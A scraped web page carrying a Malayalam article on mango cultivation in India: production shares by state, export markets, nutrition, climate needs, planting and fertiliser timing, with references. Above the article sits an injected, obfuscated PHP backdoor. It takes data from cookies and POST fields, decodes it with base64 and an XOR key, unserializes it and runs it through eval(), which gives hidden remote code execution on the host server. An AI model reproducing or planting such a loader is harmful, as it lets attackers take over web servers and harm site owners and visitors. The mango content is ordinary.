$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} മധുരമൂറുന്ന രുചിഭേദങ്ങളാല്‍ അയ്യായിരം കൊല്ലത്തെ പാരമ്പര്യം പകര്‍ന്നുതന്ന ഇന്ത്യയിലെ മാമ്പഴകൃഷി – Mannira

മധുരമൂറുന്ന രുചിഭേദങ്ങളാല്‍ അയ്യായിരം കൊല്ലത്തെ പാരമ്പര്യം പകര്‍ന്നുതന്ന ഇന്ത്യയിലെ മാമ്പഴകൃഷി

പഴങ്ങളുടെ രാജാവ്, കൂട്ടത്തില്‍ കേമനാര്? അല്‍ഫോണ്‍സ

തര്‍ക്കിക്കാനാരുണ്ട്?

ആയിരത്തോളം മാവിനങ്ങളുള്ള ഇന്ത്യയില്‍ അയ്യായിരം വര്‍ഷം മുമ്പ് മുതല്‍ മാവ് കൃഷി ചെയ്തിരുന്നെന്നാണ് അനുമാനിക്കുന്നത്. ലോകത്തേറ്റവും മാമ്പഴം ഉത്പാദിപ്പിക്കുന്നു എന്ന പ്രത്യേകതക്ക് പുറമേ രാജ്യത്തിനകത്തുതന്നെ വളരെയധികം സ്ഥലത്ത് വാണിജ്യടിസ്ഥാനത്തില്‍ കൃഷിചെയ്യുന്ന പഴവര്‍ഗം കൂടിയാണ് മാമ്പഴം. ആകെ ഉത്പാദനമായ 15 ദശലക്ഷം ടണ്‍ ലോകത്തിന്റെ മാങ്ങ ഉത്പാദനത്തിന്റെ 50 ശതമാനത്തില്‍ കൂടുതല്‍ വരും. ഒന്നാം സ്ഥാനത്ത് നില്‍ക്കുന്ന ഇന്ത്യയ്ക്ക് പുറകില്‍ നില്‍ക്കുന്നത് ചൈന, തായ്‌ലന്റ്, പാക്കിസ്ഥാന്‍, മെക്‌സിക്കോ, ഇന്തോന്യേഷ്യ, ബ്രസീല്‍ എന്നീ രാജ്യങ്ങളാണ്. ഉത്തര്‍പ്രദേശ് ആണ് ഇന്ത്യയില്‍ ഏറ്റവും കൂടുതല്‍ മാങ്ങ ഉത്പാദിപ്പിക്കുന്ന സംസ്ഥാനം, രാജ്യത്തിന്റെ മൊത്തം ഉത്പാദനത്തിന്റെ 23 ശതമാനം ഉത്പാദിപ്പിക്കുന്ന ഉത്തര്‍പ്രദേശിന് തൊട്ടുപുറകേ 22 ശതമാനം ഉത്പാദിപ്പിക്കുന്ന ആന്ധ്ര പ്രദേശും, 11 ശതമാനം ഉത്പാദിപ്പിക്കുന്ന കര്‍ണ്ണാടകയുമാണ്. കണ്ണൂര്‍, പാലക്കാട്, തൃശൂര്‍, മലപ്പുറം എന്നീ ജില്ലകളില്‍ വാണിജ്യാടിസ്ഥാനത്തില്‍ ഉത്പാദനം നടക്കുന്നുണ്ടെങ്കിലും മറ്റ് സംസ്ഥാനങ്ങളോട് താരതമ്യം ചെയ്യുമ്പോള്‍ കേരളത്തിന്റെ മാങ്ങ ഉത്പാദനം താരതമ്യേന കുറവാണ്. അത് 2008-09 വര്‍ഷത്തില്‍ നിന്ന് 2011-12 വര്‍ഷത്തേക്കെത്തുമ്പോഴും ക്രമമായ കുറവാണ് രേഖപ്പെടുത്തിയിട്ടുള്ളത്. എന്നിരുന്നാലും, വ്യത്യസ്ഥമായ മാമ്പഴങ്ങളുടെ ഉപഭോഗത്തില്‍ കേരളം ഒട്ടു പുറകിലല്ല. പറമ്പിലെ പുളിയന്മാവും നടുമുറ്റത്തെ നാട്ടുമാവും പെരുമയുടെ അടയാളങ്ങളായി കൊണ്ടു നടന്നെങ്കിലും അവയൊന്നുമല്ല ഇന്ന് കേരളത്തിന്റെ കവലകളിലും പീടികത്തിണ്ണകളിലും നിരന്നിരിക്കുന്നത്. അല്‍ഫോണ്‍സോയും, ബംഗനപ്പള്ളിയും, കേസറും, മല്‍ഗോവയും ലംഗ്രയുമൊക്കെയാണ്.

umluj city, mangoes, farming, Saudi, ഉംലജ്, മാമ്പഴ കൃഷി, സൗദി അറേബ്യ, മാങ്ങ, കൃഷി, മാന്തോപ്പ്

സ്വാദിനും വ്യത്യസ്ഥ രുചിഭേദങ്ങള്‍ക്കും പുറമേ പോഷകങ്ങളുടെ കലവറ കൂടിയാണ് മാമ്പഴം. വൈറ്റമിന്‍ എ, സി എന്നിവ ധാരാളമടങ്ങിയിരിക്കുന്നു. പ്രൊട്ടീനും ആസിഡ് അംശവും മാമ്പഴത്തില്‍ അടങ്ങിയിട്ടുണ്ട്. പഴുപ്പിച്ച് കഴിക്കുന്ന പൊതുവായ ഉപയോഗത്തിന് പുറമേ, മാങ്ങാച്ചാര്‍, ചട്ണി, സര്‍ബത്ത്, സ്‌ക്വാഷ്, ചോക്ലേറ്റ് മറ്റ് മധുരപലഹാര നിര്‍മ്മാണ എന്നിങ്ങനെ നിരവധി ആവശ്യങ്ങള്‍ക്കായി മാമ്പഴം ഉപയോഗപ്പെടുത്തുന്നുണ്ട്. ഏറെ ഉത്പാദനവും ഉപഭോഗവും ഉണ്ടെങ്കിലും രാജ്യാന്തര വിപണിയില്‍ കൈതച്ചക്കയ്ക്ക് താഴെയാണ് മാമ്പഴത്തിന്റെ സ്ഥാനം. ഔദ്യോഗിക കണക്കുകള്‍ (Agricultural and Processed Food Products Export Development Authority – APEDA) പ്രകാരം 50,000 ടണ്‍ മാമ്പഴം ഇന്ത്യ കയറ്റുമതി ചെയ്യുന്നുണ്ട്. യു എ ഇ, ബംഗ്ലാദേശ്, സൗദി അറേബ്യ, യു കെ എന്നിവിടങ്ങളിലേക്കാണ് മുഖ്യമായും കയറ്റുമതി നടക്കുന്നത്. പുറമേ, നെതര്‍ലാന്റ്, യു കെ, ഓസ്‌ട്രേലിയ, ജര്‍മ്മനി, ഫ്രാന്‍സ്, അമേരിക്ക എന്നീ രാജ്യങ്ങളിലേക്ക് ടിന്നിലടച്ച മാമ്പഴവും പഴച്ചാറുകളും ഇന്ത്യയില്‍ നിന്ന് കയറ്റുമതി ചെയ്യുന്നുണ്ട്.

രാജ്യാന്തര തലത്തില്‍ വിപണികളിലേക്ക് പ്രവഹിക്കുന്ന മാമ്പഴം ഉത്പാദിപ്പിക്കുന്നത് ഏറ്റവും അടുത്തുള്ള ഉത്പാദക രാജ്യങ്ങളാണ്. അമേരിക്കന്‍ വിപണിയിലെത്തുന്ന മാമ്പഴം കൂടുതലും മെക്‌സിക്കോ, ഹൈത്തി, ബ്രസീല്‍ എന്നീ രാജ്യങ്ങളില്‍ നിന്നാണ്, പടിഞ്ഞാന്‍ ഏഷ്യന്‍ വിപണിയിലേക്ക് ഇന്ത്യയില്‍ നിന്നും പാക്കിസ്ഥാനില്‍ നിന്നുമാണ്. ഏഷ്യന്‍ വംശജര്‍ ധാരാളമുള്ള യൂറോപ്യന്‍ രാജ്യങ്ങളിലെ വിപണികളിലെത്തുന്ന മാമ്പഴം കൂടുതലും ഏഷ്യന്‍ രാജ്യങ്ങളില്‍ നിന്നാണ്. മാത്രമല്ല, ആഗോള മാമ്പഴ ഉത്പാദനത്തിന്റെ 75 ശതമാനവും ഏഷ്യയില്‍ നിന്നുമാണ്.

സമുദ്ര നിരപ്പില്‍ നിന്നും 1400 മീറ്റര്‍ ഉയരത്തില്‍ ഉഷ്ണ, മിതോഷ്ണ മേഖലകളാണ് മാമ്പഴോത്പാദനത്തിനിണങ്ങിയ പ്രദേശങ്ങള്‍. ഏറെ മഞ്ഞ്, കാറ്റ്, കുറഞ്ഞ അന്തരീക്ഷ ഈര്‍പ്പം എന്നിവ മാവിന്റെ വളര്‍ച്ചയേയും പുഷ്പിക്കുന്നതിനേയും പ്രതികൂലമായി ബാധിക്കും. 75 – 375 സെന്റീമീറ്റര്‍ വര്‍ഷപാതവും പൂക്കുകയും കായ്ക്കുകയും ചെയ്യുന്ന സാഹചര്യത്തില്‍ മഴയില്ലാതിരിക്കുകയും ചെയ്യുന്ന സാഹചര്യവുമാണ് കൃഷിക്ക് അനുയോജ്യം.

വാണിജ്യതലത്തില്‍ മാമ്പഴം ഉത്പാദിപ്പിക്കുന്ന പ്രദേശങ്ങള്‍:

ഏകദേശം 1500 വ്യത്യസ്ത ഇനത്തിലുള്ള മാമ്പഴങ്ങള്‍ ഇന്ത്യയില്‍ വാണിജ്യ തലത്തില്‍ ഉത്പാദിപ്പിക്കുന്നുണ്ട്. അവയുടെ പേരുവിവരങ്ങളും ഉത്പാദനവും പ്രദേശവും കാലഘട്ടങ്ങളും വേര്‍തിരിച്ച്

വിത്തുപയോഗിച്ച് (മാങ്ങണ്ടി) ഉത്പാദിപ്പിക്കുന്ന മാമ്പഴം, കൃഷി ചെയ്യാന്‍ അനുയോജ്യമായ കാലം ജൂലൈ – ഓഗസ്റ്റ് മാസങ്ങളാണ്. ജലസേചന ലഭ്യത ഉറപ്പുവരുത്തുകയാണെങ്കില്‍ ഫെബ്രുവരി – മാര്‍ച്ച് മാസങ്ങളിലും തൈകള്‍ നടാവുന്നതാണ്. കൃഷി ചെയ്യുന്നര പ്രദേശത്തിന്റെ സ്വഭാവമനുസരിച്ച് വരണ്ടതും, ഈര്‍പ്പമുള്ളതുമായ പ്രദേശങ്ങളില്‍ യഥാക്രമം 10*10 ഉം 12*12 അകലത്തില്‍ തൈകള്‍ നടാവുന്നതാണ്. വര്‍ഷത്തില്‍ രണ്ടു തവണയായി വളപ്രയോഗം നടത്താം ജൂണ്‍ – ജൂലൈ കാലത്തും ഒക്ടോബറിലും. വളപ്രയോഗത്തിന് മുന്നോടിയായി മഴലഭ്യത ഉണ്ടായില്ലെങ്കില്‍ മറ്റ് മാര്‍ഗങ്ങളിലൂടെ ജലസേചനം സാധ്യമാക്കേണ്ടതാണ്.

Also Read: വൻ കുതിച്ചു ചാട്ടത്തിനൊരുങ്ങി ഓർഗാനിക് പാക്കേജ് ഫുഡ് മേഖല; 2021 ൽ ലക്ഷ്യമിടുന്നത് 871 മില്യൺ രൂപയുടെ വളർച്ച

വളപ്രയോഗം, കീടനിയന്ത്രണം എന്നിവ അതാതു സമയങ്ങളില്‍ ശ്രദ്ധയോടെ കൈകാര്യം ചെയ്യേണ്ട വിഷയങ്ങളാണ്. പൂപ്പ്, പുഴുക്കടി എന്നിവ നേരിടുന്ന കാലങ്ങളില്‍ അനുയോജ്യമായ രാസകീടനാശിനികള്‍ ഉപയോഗിക്കുന്ന പ്രവണതയാണ് പരക്കെ ഉള്ളത്. ആറാം വര്‍ഷം മുതല്‍ 35 വര്‍ഷം വരെ വിളവ് തരാനുള്ള ശേഷി മാവിനുണ്ട്.

References:

  1. http://nhb.gov.in/report_files/mango/MANGO.htm
  2. http://keralaagriculture.gov.in/htmle/bankableagriprojects/ph/mango.htm
  3. http://economictimes.indiatimes.com/news/economy/foreign-trade/india-to-export-mangoes-to-australia-for-the-first-time/articleshow/58338728.cms